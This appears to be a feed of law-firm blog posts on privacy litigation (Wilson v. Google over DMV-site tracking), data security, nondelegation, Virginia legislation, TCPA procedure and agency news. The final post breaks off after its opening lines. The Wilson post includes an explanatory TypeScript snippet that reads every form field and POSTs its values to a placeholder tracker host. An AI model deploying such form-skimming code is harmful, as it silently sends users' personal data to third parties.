WHEN GOOGLE FOLLOWS YOU TO THE DMV: Where Consent Gets Lost in the Traffic

Happy CIPA Sunday! What feels like a routine online interaction with your state could be something else entirely. Imagine for a moment that you’re renewing your disability parking placard online. It’s another government form to fill out from the comfort of your home. You input your personal information, including sensitive details about your disability, and click submit. You don’t realize that an invisible digital hand may reach through your screen (figuratively speaking), quietly collecting your most sensitive personal information. Isn’t that a scary thought? This isn’t the plot of the new season of Black Mirror (or is it?); it’s the allegation at the center of Wilson v. Google L.L.C., No. 24-cv-03176-EKL, 2025 U.S. Dist. LEXIS 55629 (N.D. Cal. Mar. 25, 2025).
Here, Plaintiff was just trying to renew her disability parking placard through California’s “MyDMV” portal when she allegedly fell victim to what her lawsuit describes as Google’s secret data collection. According to the Opinion, Plaintiff provided the DMV with her “personal information, including disability information,” only to later discover that Google had used Google Analytics and DoubleClick tools embedded on the DMV’s website to unlawfully collect that information as she renewed her placard. Like millions of Americans, Plaintiff trusted that her interaction with a government agency would remain private. Instead, she alleges, her information was used to generate revenue for Google’s advertising and marketing business. If the allegations are proven true, Google essentially eavesdropped on what should have been a private interaction between a citizen and her state government.
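To make the alleged mechanism concrete, here is a deliberately generic sketch (illustrative only; this is not Google’s actual code, and the collection endpoint is made up) of how any third-party script embedded in a web page can observe what a user types into a form and ship it off to the script owner’s servers:

```typescript
// Illustrative sketch only: how an embedded third-party script could observe
// form input. NOT Google's code; the collection endpoint is hypothetical.
document.querySelectorAll<HTMLInputElement>("form input").forEach((field) => {
  field.addEventListener("change", () => {
    // A script tag embedded by the site runs with full access to the page,
    // so it can read user-entered values and send them to a third party.
    void fetch("https://tracker.example.com/collect", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ field: field.name, value: field.value }),
    });
  });
});
```

The point of the sketch is simply that, from the browser’s perspective, nothing distinguishes a first-party form handler from a third-party analytics tag; both run in the page and see the same user input.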
Plaintiff’s lawsuit hinges on two critical privacy laws, and together they reveal the complex landscape of privacy law in America. First, the Driver’s Privacy Protection Act (“DPPA”) is a federal law designed to prevent unauthorized disclosure of personal information from DMV records. Second, the California Invasion of Privacy Act (“CIPA”) protects against “the substantive intrusion that occurs when private communications are intercepted by someone who does not have the right to access them.” Campbell v. Facebook, Inc., 951 F.3d 1106, 1118 (9th Cir. 2020). Neither law was crafted with modern digital technology in mind; they are legal shields designed for a different era, now being tested against sophisticated surveillance technologies. Together, these laws create a safety net meant to protect our personal information, but are they strong enough to catch Big Tech’s increasingly sophisticated data collection methods?
Google’s defense strategy is smart and calculated to exploit procedural technicalities rather than address the fundamental privacy questions at stake. Its first move was to argue that the California DMV was a “required party” under Fed. R. Civ. P. 19 and that the entire case should be dismissed because the DMV could not be joined (due to sovereign immunity). It’s a clever technical legal argument that, had it succeeded, could have created a precedent for tech companies to evade privacy lawsuits involving government websites. Judge Eumi K. Lee wasn’t buying it, though. She rejected Google’s argument, finding that dismissing Plaintiff’s claims outright “would be draconian, particularly because Plaintiff seeks other relief too—including damages.” Wilson, 2025 U.S. Dist. LEXIS 55629, at *7. The Court rightfully distinguished the case from Downing v. Globe Direct L.L.C., 806 F. Supp. 2d 461 (D. Mass. 2011), noting that, unlike in Downing, where a vendor was explicitly contracted to include advertising, Plaintiff had alleged that Google encourages website operators, including the DMV, to use Google’s tools to obtain personal information that Google uses for its own advertising business.
Google had more success with Plaintiff’s DPPA claim. The Court focused on a technical but crucial question: Did Google obtain Plaintiff’s personal information from a motor vehicle record? The Ninth Circuit had previously ruled in Andrews v. Sirius XM Radio Inc. that the DPPA does not apply when “the initial source of personal information is a record in the possession of an individual, rather than a state DMV.” Andrews v. Sirius XM Radio Inc., 932 F.3d 1253, 1260 (9th Cir. 2019). With this in mind, Judge Lee determined that because “the personal information that was allegedly transmitted to Google came from Plaintiff, it was not from a motor vehicle record.” Wilson, 2025 U.S. Dist. LEXIS 55629, at *11. This distinction creates a troubling loophole in privacy protection: your data is protected when it sits in a DMV database, but it loses that protection while you are transmitting it to the DMV. That seemingly minor distinction, whether the data was pulled from a DMV database or intercepted as the user entered it, made all the difference for Plaintiff’s DPPA claim, which was dismissed with leave to amend.
Isn’t this getting spicy? Here’s where the plot thickens. While Plaintiff’s DPPA claim stumbled, her state-law claim under CIPA survived Google’s dismissal motion. Google had asserted it couldn’t be liable under CIPA because it was merely acting as a “vendor” for the DMV, an extension of the government website rather than a third-party eavesdropper. It’s a fantastic assertion by Google’s defense team: think of Google claiming to be the DMV’s trusted assistant rather than an uninvited guest at a private conversation. Judge Lee rejected this defense, however, noting that Plaintiff had sufficiently alleged that “Google intercepted and used her personal information for its own advertising services” and thus “did not act solely as an extension of the DMV.” Id. at *13. The Court further found that Plaintiff had adequately alleged Google acted “willfully” by detailing how Google “specifically designed” its tracking tools to gather information and “intentionally encourages” website operators to use its tools in ways that circumvent users’ privacy settings. Id. at *14. That kind of intentionality matters when pleading willfulness under CIPA.
Google also tried to shield itself behind its terms of service, which allegedly prohibited websites from sharing personally identifiable information with Google. But Judge Lee noted that this assertion created “a question of fact” that couldn’t be resolved at the pleading stage. Id. at *15. The Court relied on Smith v. Google LLC, explaining that while “Google argues that judicially noticeable policy documents suggest that Google did not actually want to receive personally identifiable information and expressly prohibited developers from transmitting such data, this presents a question of fact that the Court cannot resolve at this stage.” Id. (quoting Smith v. Google LLC, 735 F. Supp. 3d 1188, 1198 (N.D. Cal. 2024)). The message is clear: fine print in a company’s terms of service won’t necessarily provide legal cover for its actual data collection practices.
This case feels like déjà vu for privacy advocates because we’ve seen this before. Similar allegations were raised against LinkedIn in Jackson v. LinkedIn Corp., 744 F. Supp. 3d 986 (N.D. Cal. 2024). The parallels between the two cases are striking; both involve allegations that tech giants harvested sensitive data from DMV websites. Google even tried to use these similarities against Plaintiff, characterizing her allegations as “entirely boilerplate” and “almost identical to the same allegations” asserted against LinkedIn in Jackson. Wilson, 2025 U.S. Dist. LEXIS 55629, at *15. The Court rejected this argument too, noting that the similarity between the complaints does not render Plaintiff’s allegations conclusory, especially given that both cases challenge similar alleged conduct by two different advertising companies. Google also invoked Byars v. Hot Topic, Inc., 656 F. Supp. 3d 1051 (C.D. Cal. 2023), where the court criticized “copy-and-paste” privacy complaints filed in bulk. Judge Lee pushed back, emphasizing that, unlike in Byars, Plaintiff’s Complaint here includes “at least 48 paragraphs of detailed allegations specific to Google” and cannot be dismissed as generic boilerplate. Wilson, 2025 U.S. Dist. LEXIS 55629, at *16.
So what’s the takeaway? When you enter personal information into a government site, like renewing your vehicle registration or applying for a disability placard, it feels like a private exchange. But behind the screen, third-party tools may be collecting your data. It sounds like Black Mirror, but it’s happening. It’s as if you were filling out a paper form at the DMV counter, only to discover a marketing executive peering over your shoulder, taking notes on your personal information. The legal distinction between information stored in a government database and information you’re actively entering may seem arbitrary from a privacy perspective, but it creates a significant gap in legal protection.
As the case progresses, Plaintiff has been granted leave to amend her DPPA claim, and her CIPA claim will proceed. This case reminds us that data privacy isn’t just about keeping private things—well… private—it’s about controlling who knows what about us and how that information is used. With every click and keystroke, who else might be watching as you type?
As always,
Keep it legal, keep it smart, and stay ahead of the game.
Talk soon!

Privacy and Data Security in Community Associations: Navigating Risks and Compliance

Privacy and data security laws govern how organizations collect, handle, and protect personally identifiable information (PII) to ensure it is properly processed and protected.
For community associations, this is especially important because these organizations often manage large amounts of PII of homeowners and residents (e.g., names, addresses, phone numbers), including certain categories of sensitive PII, such as financial details. With identity theft and various cyber scams on the rise, cybercriminals frequently target this type of data. Once this data is accessed, a threat actor can do virtually anything with it. For instance, the threat actor can sell the PII to the highest bidder; encrypt the data and hold it for ransom, meaning the community association can no longer access the information and potentially must pay large sums to get it back; or make a copy of the PII and then extort the community association to return or delete the data instead of releasing it publicly, among other malicious acts.
With these risks in mind, data security breaches have become a widespread concern, prompting legislative action. All fifty states now have laws requiring organizations to notify individuals if unauthorized access to PII occurs; these requirements apply to community associations in North Carolina under North Carolina General Statute § 75-65. To avoid a data security breach, North Carolina community associations should prioritize taking steps to protect the PII of their residents and homeowners.
While North Carolina does not offer specific statutory guidance for community associations regarding personal data handling, federal frameworks can help. The National Institute of Standards and Technology (NIST) has developed comprehensive privacy and cybersecurity guidelines. To view their resource and overview guide, visit this link. NIST’s frameworks assist organizations in identifying the data they possess, protecting it, managing and governing it with clear internal rules, and responding to and recovering from data security incidents. Some of the key steps a community association can take to protect its data are summarized in the list below.
Key Steps for Strengthening Privacy and Data Security

Keep Technology Updated. Community associations should prioritize keeping their systems, networks, and software up to date. Oftentimes, software updates include patches for security vulnerabilities that threat actors can exploit. As technology evolves, new threats emerge, and software updates are designed to address these risks by closing security gaps. In addition, community associations should change passwords periodically and ensure that passwords are not reused across systems and websites. Where available, multi-factor authentication should be enabled on log-in platforms; it adds an extra layer of security beyond a password, which can be guessed, stolen, or compromised.
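For readers curious about the mechanics, the sketch below (a minimal illustration of the time-based one-time password math used by many authenticator apps, written in TypeScript against Node’s built-in crypto module; it is not a product recommendation, and real systems should rely on a vetted library) shows why an authenticator code adds protection a password alone cannot:

```typescript
import { createHmac } from "node:crypto";

// Minimal TOTP (RFC 6238-style) sketch: the server and the user's
// authenticator app derive the same short-lived code from a shared secret.
function totpCode(secret: Buffer, timeStepSec = 30, digits = 6): string {
  // Both sides compute the same counter from the current time window.
  const counter = Math.floor(Date.now() / 1000 / timeStepSec);
  const msg = Buffer.alloc(8);
  msg.writeBigUInt64BE(BigInt(counter));
  // HMAC ties the code to a secret exchanged once, at enrollment.
  const mac = createHmac("sha1", secret).update(msg).digest();
  const offset = mac[mac.length - 1] & 0x0f; // dynamic truncation
  const code = (mac.readUInt32BE(offset) & 0x7fffffff) % 10 ** digits;
  return code.toString().padStart(digits, "0");
}

// A stolen or guessed password alone fails the login: the attacker would
// also need the current code, which changes roughly every 30 seconds.
const secret = Buffer.from("example-enrollment-secret"); // hypothetical
console.log(totpCode(secret)); // e.g., "492039"
```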
Manage Access. Ensure that only necessary employees have access to residents’ and homeowners’ PII. For those who have access, provide adequate training to confirm they are apprised of the community association’s cybersecurity policies and procedures, can recognize common attack methods used by threat actors, and know to avoid and report any suspicious activity. One of the most basic ways to manage access is to ensure the community association collects only the information it absolutely needs to carry out its operations: the less data in the association’s possession, the less data a threat actor can access.
Regularly Review Vendor Contracts. It’s crucial for community associations to audit contracts with vendors, at least annually, to ensure they align with the association’s risk tolerance. Many breaches stem from third-party service providers who have access to PII and sensitive PII. Without clear contractual safeguards, a breach could result in significant remediation costs, with limited legal recourse against the responsible vendor. Always be sure that your contracts address data protection and breach response obligations.
Consider Cyber Insurance. Cyber insurance has become an essential risk management tool for community associations. However, it’s important to understand that cyber insurance is not a catch-all solution. Insurers are increasingly raising premiums and limiting coverage for organizations that fail to implement strong data protection practices. Cyber insurance should be seen as a safety net, not a substitute for a comprehensive privacy and security strategy. Community associations should also periodically review their cyber insurance policies to confirm they are providing coverage for any new or emerging threats that may arise.
Engage the Community. Transparency, especially regarding the categories of data collected and how they are used, is key to building trust with residents and homeowners. Community associations should seek input from their stakeholders on privacy and data security policies. While legal obligations will not change based on community sentiment, understanding residents’ concerns can help guide decision-making and foster a sense of accountability. Discussing data security efforts and proactively addressing cybersecurity challenges at an annual meeting provides an opportunity to clarify expectations and show the association’s commitment to protecting personal information.

For guidance on strengthening a community association’s privacy and data security efforts, contact us to learn more about best practices and compliance strategies.

Nondelegation and Environmental Law

Earlier this week, the Supreme Court held oral argument in Federal Communications Commission v. Consumers’ Research.1 The case addresses the Federal Communications Commission’s Universal Service Fund programs aimed at providing funding to connect certain customers with telecommunications services. The challengers contend that Congress ran afoul of the nondelegation doctrine in authorizing the FCC to set up the Universal Service Fund programs and that these programs are therefore unlawful.
Although that issue might appear far removed from issues of environmental law, the case could have significant ramifications and could curtail Congress’s ability to authorize federal administrative agencies to issue binding regulations. That curtailment could reach to congressional enactments that authorize the Environmental Protection Agency to promulgate regulations in a variety of areas, including several major environmental statutes like the Clean Air Act, the Clean Water Act, and the Safe Drinking Water Act, to name a few.
What is the Nondelegation Doctrine and Why is it Important?
The nondelegation doctrine holds that Congress may not delegate lawmaking (i.e., legislative) authority to executive branch agencies. As some observers have put it, however, the nondelegation doctrine had only one good year, in 1935, when the Supreme Court struck down two federal laws authorizing the executive to take certain actions that were considered legislative in nature. The cases were A.L.A. Schechter Poultry Corp. v. United States and Panama Refining Co. v. Ryan.
Besides those two cases, the Supreme Court has not struck down any other federal laws on nondelegation grounds. This is because, after 1935, the Supreme Court adopted a relatively permissive test of whether a statute runs afoul of the nondelegation doctrine. The test, referred to as the “intelligible-principle” test, looks to whether Congress has provided the administrative agency with some “intelligible principle” to follow in promulgating regulations pursuant to a congressional enactment.
Applying the intelligible-principle test, the Supreme Court has repeatedly, and over approximately eight decades, upheld congressional delegations of rulemaking power to administrative agencies.
However, in 2019, a dissenting opinion written by Justice Gorsuch in Gundy v. United States called on the Court to abandon the intelligible-principle test and instead move toward a test under which an agency cannot make policy decisions and is instead limited to a role where it only “fills up the details” or makes factual determinations. Notably, the Gundy dissent was joined by Chief Justice Roberts and Justice Thomas, and Justices Alito and Kavanaugh elsewhere expressed support for the Gundy dissent’s approach. Gundy was also decided before Justice Barrett joined the Court. This has Supreme Court watchers asking whether the Court might inject more stringency into the nondelegation test in an appropriate case.
Enter Consumers’ Research. This is the first Supreme Court case to squarely raise nondelegation issues since Gundy. The challengers to the Universal Service Fund program argue that Congress gave the FCC unchecked authority to raise funds to be directed toward the goal of providing universal service from telecommunications services providers. The FCC (and intervenors) respond that the program “passes . . . with flying colors” and fits comfortably within past nondelegation cases because of the numerous restrictions that the statute places on the FCC. If the Supreme Court were to shift course by establishing a more stringent nondelegation test, it could significantly constrain Congress’s ability to delegate rulemaking powers to administrative agencies. Importantly, a more stringent test for nondelegation challenges could also impact numerous existing federal laws. We discuss just a sample of environmental laws that could be affected in the following section.
What Could it Mean for Environmental Law, and You?
One of the most obvious areas where a more stringent nondelegation test could impact environmental law is the setting of air and water quality standards.
For example, the Clean Air Act directs the EPA to set air quality standards that apply nationwide. The Clean Air Act provides relatively loose guidance on how the EPA should go about that task, directing the EPA to promulgate standards “requisite to protect the public health” while “allowing an adequate margin of safety.” The Supreme Court upheld that delegation in Whitman v. American Trucking Associations, Inc., but if the Supreme Court were to take a more stringent approach to nondelegation like that in the Gundy dissent, the EPA may not be able to make the decision of what air standard is “requisite to protect the public health” because that could be viewed as a key policy determination and more than “fill[ing] up the details.”
Likewise, in the Clean Water Act, the EPA is also directed to review water quality standards set by individual states, again taking into account a relatively broad instruction from Congress “to protect the public health or welfare, enhance the quality of water and serve the purposes of this chapter” while also considering the waters’ “use and value for public water supplies, propagation of fish and wildlife, recreational purposes, and agricultural, industrial, and other purposes, and . . . their use and value for navigation.” Again, a more stringent nondelegation test could find that these instructions leave the EPA with too much of a policy-making role.
Finally, in the Safe Drinking Water Act, the EPA is directed to set maximum contaminant level goals “at the level at which no known or anticipated adverse effects on the health of persons occur and which allows an adequate margin of safety.” This direction to set a standard is potentially less at risk because it requires more fact finding (i.e., determining “known or anticipated adverse effects on” health), but the requirement to determine an “adequate” safety margin might be deemed to be too close to policymaking.
Although nondelegation challenges to these types of environmental regulations have been raised in the past, they have failed at least in part because of the relaxed intelligible-principle test. The outcome in Consumers’ Research could change that. The Environmental Team at Womble Bond Dickinson is well-suited to evaluate these specific questions of law with you.
Counting Noses in Consumers’ Research
For now, it appears that the current nondelegation test will live to see another day. Only Justices Thomas, Alito, and Gorsuch seemed readily willing to make the test more stringent. The Justices appointed by Democratic presidents (Sotomayor, Kagan, and Jackson) are sure “no” votes. As for the three Justices typically left in the middle, Chief Justice Roberts was unusually quiet during argument, while both Justices Kavanaugh and Barrett pushed back on counsel for Consumers’ Research in numerous instances. Given that the Universal Service Fund program enjoys continuing and broad bipartisan support, this may not be the case in which any of the middle three Justices is willing to take on the nondelegation issue, especially after the Court has already issued decisions that rein in administrative agency authority through the major-questions doctrine and by overruling the Chevron deference regime.
Regardless, the Supreme Court’s opinion, which should issue by July 2025, will likely reveal where the Court is headed on nondelegation issues and could signal that a more searching nondelegation test is on the horizon. 

1 Brief disclaimer: Michael Miller worked on this case in the earlier stages of litigation before it was brought before the Supreme Court. This update does not share any views on the merits of the case.

Virginia Enacts Law Protecting Reproductive and Sexual Health Data

On March 24, 2025, Virginia Governor Youngkin signed into law S.B. 754, which amends the Virginia Consumer Data Protection Act (“VCDPA”) to prohibit the collection, disclosure, sale or dissemination of consumers’ reproductive or sexual health data without consent.
The law defines “reproductive or sexual health information” as “information relating to the past, present, or future reproductive or sexual health” of a Virginia consumer, including:

Efforts to research or obtain reproductive or sexual health information services or supplies, including location information that may indicate an attempt to acquire such services or supplies;
Reproductive or sexual health conditions, status, diseases, or diagnoses, including pregnancy, menstruation, ovulation, ability to conceive a pregnancy, whether an individual is sexually active, and whether an individual is engaging in unprotected sex;
Reproductive and sexual health-related surgeries and procedures, including termination of a pregnancy;
Use or purchase of contraceptives, birth control, or other medication related to reproductive health, including abortifacients;
Bodily functions, vital signs, measurements, or symptoms related to menstruation or pregnancy, including basal temperature, cramps, bodily discharge, or hormone levels;
Any information about diagnoses or diagnostic testing, treatment, or medications, or the use of any product or service relating to the matters described above; and
Any information described above that is derived or extrapolated from non-health-related information such as proxy, derivative, inferred, emergent, or algorithmic data.

“Reproductive or sexual health information” does not include protected health information under HIPAA, health records for the purposes of Title 32.1, or patient-identifying records for the purposes of 42 U.S.C. § 290dd-2.
These amendments to the VCDPA will take effect on July 1, 2025.

Virginia Governor Vetoes Rate Cap and AI Regulation Bills

On March 25, Virginia Governor Glenn Youngkin vetoed two bills that sought to impose new restrictions on “high-risk” artificial intelligence (AI) systems and fintech lending partnerships. The vetoes reflect the Governor’s continued emphasis on fostering innovation and economic growth over introducing new regulatory burdens.
AI Bias Bill (HB 2094)
The High-Risk Artificial Intelligence Developer and Deployer Act would have made Virginia the second state, after Colorado, to enact a comprehensive framework governing AI systems used in consequential decision-making. The proposed law applied to “high-risk” AI systems used in employment, lending, and housing, among other fields, requiring developers and deployers of such systems to implement safeguards to prevent algorithmic discrimination and provide transparency around how automated decisions were made.
The law also imposed specific obligations related to impact assessments, data governance, and public disclosures. In vetoing the bill, Governor Youngkin argued that its compliance demands would disproportionately burden smaller companies and startups and could slow AI-driven economic growth in the state.
Fintech Lending Bill (SB1252)
Senate Bill 1252 targeted rate exportation practices by applying Virginia’s 12% usury cap to certain fintech-bank partnerships. Specifically, the bill sought to prohibit entities from structuring transactions in a way that evades state interest rate limits, including through “rent-a-bank” models, personal property sale-leaseback arrangements, and cash rebate financing schemes.
Additionally, the bill proposed broad definitions for “loan” and “making a loan” that could have reached a wide array of service providers. A “loan” was defined to include any recourse or nonrecourse extension of money or credit, whether open-end or closed-end. “Making a loan” encompassed advancing, offering, or committing to advance funds to a borrower. In vetoing the measure, Governor Youngkin similarly emphasized its potential to discourage innovation and investment across Virginia’s consumer credit markets.
Putting It Into Practice: The vetoes of the High-Risk Artificial Intelligence Developer and Deployer Act (previously discussed here) and the Fintech Lending Bill signal Virginia’s preference for more flexible, innovation-friendly oversight. This development aligns with a broader pullback from federal agencies with respect to oversight of fintech and related emerging technologies (previously discussed here and here). Fintechs and consumer finance companies leveraging AI should continue to monitor what has become a rapidly evolving regulatory landscape.

A TALE OF TWO REJECTED MOTIONS: Court Denies Plaintiff’s Motion for Leave to Amend and Defendant’s Motion to Compel

Hey, TCPAWorld!
Be timely. Don’t skip procedural steps. And always bring receipts.
In SHANAHAN v. MFS SUPPLY LLC, No. 8:23CV475, 2025 WL 885265 (D. Neb. Mar. 21, 2025), both Terrence Shanahan (“Plaintiff”) and MFS Supply LLC (“Defendant”) filed competing motions. Plaintiff filed a Motion for Leave to Modify the First Amended Class Action Complaint and Case Progression Order, aiming to revise the class definition based on new facts uncovered during discovery. Meanwhile, Defendant filed a Motion to Compel, to Deem Admissions Admitted, and to Enlarge the Number of Interrogatories, asking the Court to force Plaintiff to respond to its discovery requests.
The Court denied both motions.
Background
On October 27, 2023, Plaintiff filed a class action complaint accusing Defendant of sending unsolicited telemarketing texts to consumers on the national Do Not Call Registry (DNC). Plaintiff claims he received two such texts promoting real estate lockboxes and asserts he never gave consent, with his number registered on the DNC since December 17, 2004.
Plaintiff seeks to represent the following class:
“All persons in the United States who: (1) from the last 4 years to present (2) Defendant texted more than once in a 12-month period (3) whose telephone numbers were registered on the Federal Do Not Call registry for more than 30 days at the time the texts were sent.” (Filing No. 1 at p. 4). Plaintiff’s Complaint contains one cause of action for violations of 47 U.S.C. § 227(c) by telemarketing to telephone numbers listed on the Federal Government’s National Do Not Call Registry.

Id. at *2. Plaintiff asserts a single cause of action, alleging that the Defendant violated 47 U.S.C. § 227(c) by making telemarketing calls to phone numbers registered on the National Do Not Call Registry.
Defendant filed an answer broadly denying Plaintiff’s allegations and asserting multiple affirmative defenses, including statutory exclusions and claims that Plaintiff and the putative class consented—either expressly or implicitly—to receiving the messages, among others.
Following the parties’ Rule 26(f) Report, the Court set June 24, 2024, as the deadline for written discovery and July 8, 2024, as the deadline to file a motion to compel. The Case Progression Order required parties to first contact the magistrate judge and receive authorization from the Court before filing a motion to compel.
Discovery
On February 7, 2024, Defendant served discovery requests and later deposed Plaintiff on May 6, revealing new information allegedly not disclosed in prior cases, including that Plaintiff’s phone number had been tied to his real estate license and business since 2006. Then, on May 8, 2024, Defendant served a second set of discovery requests, which Plaintiff largely objected to as exceeding the interrogatory limit under Rule 33(a) and as irrelevant, burdensome, vague, and ambiguous, among other objections. After receiving Plaintiff’s responses, the parties engaged in an exchange that would entertain—or agitate—any litigator, and according to the Court, went something like this:
Defense counsel: “These are late.”
Plaintiff’s counsel: “No they’re not.”
Defense counsel: “The admissions were due on the 7th. You are late on the admissions. The remainder of the responses are woefully inadequate…”
Plaintiff’s counsel: “Thank you for your professional courtesy in waiting one day. The requests were all overly broad.”
Defense counsel: No response.

Id. at *2-3.
Counsel informed the Court of a dispute over whether Plaintiff should be allowed to conduct class discovery, and shortly before the conference, Plaintiff moved to amend the Complaint. During the June 17, 2024, conference, the Court directed Plaintiff to file an amended motion after finding no good cause for missing the amendment deadline under Rule 16(b). Further, the Court declined to grant class discovery or allow a motion to compel, instead directing the parties to resolve the issues through further meet-and-confer efforts.
On June 26, 2024, Plaintiff filed an amended motion to amend the complaint, seeking to revise the class definition and establish standing based on information learned during Defendant’s deposition, which revealed that Defendant had sent approximately 34,000 text messages to a nationwide list that included Plaintiff. Plaintiff sought to add the following allegations to his Complaint:
“Defendant obtained Plaintiff’s information when it downloaded a nationwide list of 17,000 (Seventeen Thousand) Berkshire Hathaway Ambassador real estate agents. Plaintiff was unaware and had no knowledge that Defendant obtained Plaintiff’s information. Defendant uploaded the list to Textedly, a text messaging platform, and sent out two text messages soliciting one of its popular products (lockboxes, which are locked boxes for keys that realtors share).
Plaintiff’s phone number ending in 1146 is Plaintiff’s only residential phone number, and Plaintiff does not have a ‘landline.’
Plaintiff’s phone number ending in 1146 is his personal cell phone.
Plaintiff owns a real estate business and maintains four separate phone numbers ending in 6224, 0737, 6430 and 0366 for operational purposes so that people do not call his personal cell phone for matters dealing with routine operation of the business.”

Id. at *3. Plaintiff also sought to amend the class definition as follows:
“All persons in the United States who: (1) are on the list of Berkshire Hathaway Realtors obtained by MFS Supply LLC; (2) whose telephone numbers were connected to cell phones; (3) registered on the Federal Do Not Call registry; (4) whose owners do not maintain any other residential telephone numbers; and (5) do have separate telephone number(s) for business purposes.”

Id. On July 8, 2024, Defendant filed a Motion to Compel, seeking additional interrogatories and to deem admissions admitted, alleging that Plaintiff’s counsel failed to provide documents, respond to interrogatories, or meet discovery deadlines.
Court’s Analysis of the Competing Motions
The Court began by analyzing Plaintiff’s Motion to Amend his Complaint.
Under Rule 15(a), courts should freely grant leave to amend when justice requires, but if a scheduling deadline has passed, the party must first show good cause under Rule 16(b). Because Plaintiff filed his motion to amend more than three months after the March 15, 2024 deadline set in the Court’s scheduling order, he must first show good cause.
The primary measure of good cause is the movant’s diligence in trying to meet the deadline. Courts generally do not consider prejudice if the movant was not diligent, and absent newly discovered facts or changed circumstances, delay alone is insufficient to justify amendment. The Court found Plaintiff lacked good cause: the facts were not newly discovered and could have been included earlier with diligence, nor did they alter the legal basis of Plaintiff’s claims, which already addressed unsolicited texts sent despite his presence on the Do Not Call Registry. The Court also stated that granting the amendment after discovery had closed would cause delay, require further discovery, and unfairly prejudice Defendant.
Next, the Court analyzed Defendant’s Motion to Compel.
The Court denied Defendant’s motion for failing to follow procedural requirements, including not requesting a conference with the magistrate judge as required by the Case Progression Order and Civil Case Management Practices. Defendant also failed to show proof of a proper meet and confer, such as the date and time of the conferral or attachments of any related communications between the parties. Plaintiff, on the other hand, submitted email evidence demonstrating that his counsel requested to meet and confer to resolve the discovery issues; Defendant, however, ignored the request and instead focused on filing the instant motion.
Moreover, the Court found that even if Defendant’s procedural failures were excused, the motion to compel still lacked the required evidentiary support to challenge Plaintiff’s production or objections, as local rules require supporting evidence for motions relying on facts outside the pleadings.
Specifically, the Court denied Defendant’s request for Plaintiff to respond to its second set of interrogatories, because Defendant exceeded the 25-interrogatory limit under Rule 33(a)(1) and failed to address the merits of Plaintiff’s objections or provide the original set of interrogatories.
Defendant’s request for production was denied as Defendant did not identify which of the 29 requests were deficient or explain why Plaintiff’s objections were invalid.
Finally, the Court denied the requests for admissions. Although Plaintiff’s responses were three days late, the Court, in its discretion, treated them as a request to withdraw deemed admissions and accepted them, finding no prejudice to Defendant and no impact on the merits of the case.
Takeaways
Scheduling orders are not mere suggestions made by the Court, and parties are expected to follow them. While the Court has discretion to approve untimely requests to amend, the movant must show good cause under Rule 16(b), supported by diligence, not by reliance on preexisting facts that could have been included earlier.
Further, skipping procedural steps, such as a meet-and-confer, can kill your motion before its merits are weighed.
Finally, if you’re challenging discovery responses, make sure to bring receipts. Courts want precision—not general statements.

FDIC Aims to Eliminate Reputational Risk from Supervision

On March 24, acting FDIC Chairman Travis Hill informed Congress that the agency is preparing to eliminate the use of “reputation risk” as a basis for supervisory criticism. In a letter to Rep. Dan Meuser (R-Pa.), Hill explained that the FDIC has completed a review of its regulations, guidance, and examination procedures to identify and remove references to reputational concerns in its supervisory framework.
Hill stated that the FDIC will propose a rule that ensures bank examiners do not issue supervisory findings based solely on reputational factors, which have faced criticism from lawmakers who argue the concept has been used to discourage banking relationships with lawful but politically sensitive industries.
The FDIC is also reevaluating its oversight of digital asset activities. According to Hill, the agency intends to replace a 2022 policy requiring FDIC-supervised institutions to notify the agency and obtain supervisory feedback before engaging in crypto-related activities. The new approach will aim to provide a clearer framework for banks to engage in blockchain and digital asset operations, so long as they maintain sound risk management practices. Hill noted that the FDIC is coordinating with the Treasury Department and other federal bodies to develop this updated framework.
Putting It Into Practice: This initiative closely mirrors the OCC’s recent decision to eliminate reputational risk as a factor in bank supervision (previously discussed here). Both agencies appear to be responding to criticism that reputational concerns have been used to discourage banking relationships with lawful but disfavored industries. Banks should prepare for changes in examination procedures and evaluate how these developments may impact their compliance strategies.

SEC Creates New Tech-Focused Enforcement Team

On February 20, the SEC announced the creation of its Cyber and Emerging Technologies Unit (CETU) to address misconduct involving new technologies and strengthen protections for retail investors. The CETU replaces the SEC’s former Crypto Assets and Cyber Unit and will be led by SEC enforcement veteran Laura D’Allaird.
According to the SEC, the CETU will focus on rooting out fraud that leverages emerging technologies, including artificial intelligence and blockchain, and will coordinate closely with the Crypto Task Force established earlier this year (previously discussed here). The unit comprises approximately 30 attorneys and specialists across multiple SEC offices and will target conduct that misuses technological innovation to harm investors and undermine market confidence.
The CETU will prioritize enforcement in the following areas:

Fraud involving the use of artificial intelligence or machine learning;
Use of social media, the dark web, or deceptive websites to commit fraud;
Hacking to access material nonpublic information for unlawful trading;
Takeovers of retail investor brokerage accounts;
Fraud involving blockchain technology and crypto assets;
Regulated entities’ noncompliance with cybersecurity rules and regulations; and
Misleading disclosures by public companies related to cybersecurity risks.

In announcing the CETU, Acting Chairman Mark Uyeda emphasized that the unit is designed to align investor protection with market innovation. The move signals a recalibration of the SEC’s enforcement strategy in the cyber and fintech space, with a stronger focus on misconduct that directly affects retail investors.
Putting It Into Practice: Formation of the CETU follows Commissioner Peirce’s statement on creating a regulatory environment that fosters innovation and “excludes liars, cheaters, and scammers” (previously discussed here). The CETU is intended to reflect that approach, redirecting enforcement resources toward clearly fraudulent conduct involving emerging technologies like AI and blockchain.

FDA Announces a “Chemical Contaminants Transparency Tool” to Evaluate Potential Health Risks of Contaminants in Human Foods

On March 20, 2025, the Food and Drug Administration (FDA) announced the availability of a Chemical Contaminants Transparency Tool, a database intended to provide users with a list of contaminant levels in the food supply.
Contaminant levels, such as tolerances, action levels, and guidance levels, are used by FDA to evaluate potential health risks in food.  If contaminant levels exceed the permissible threshold, FDA will deem the food to be unsafe.
The database compiles existing information from several sources, including compliance policy guides, guidance for industry, and the Code of Federal Regulations, into a single reference.  Each record includes the contaminant’s name, the commodity, the contaminant level type, the level value, and the reference source.  There are currently 301 records in the database.
According to the news release, under the direction of Secretary Kennedy, the Chemical Contaminants Transparency Tool is one new initiative intended to modernize chemical safety.  The intention behind the database is to offer the American public “informed consent about what they are eating.”

HUGE WIN FOR LENDING TREE!: Court Holds Tree is Not Responsible for Affiliate Calls in Pay Per Call Program And That’s Huge News

So Tree and I have buried the hatchet and are friends again; in fact, Lending Tree will be speaking at Law Conference of Champions III, how awesome is that!
But the BEST way to get on the Czar’s good side is to deliver huge industry-helping TCPA wins, and that is EXACTLY what Tree just did and I LOVE TO SEE IT.
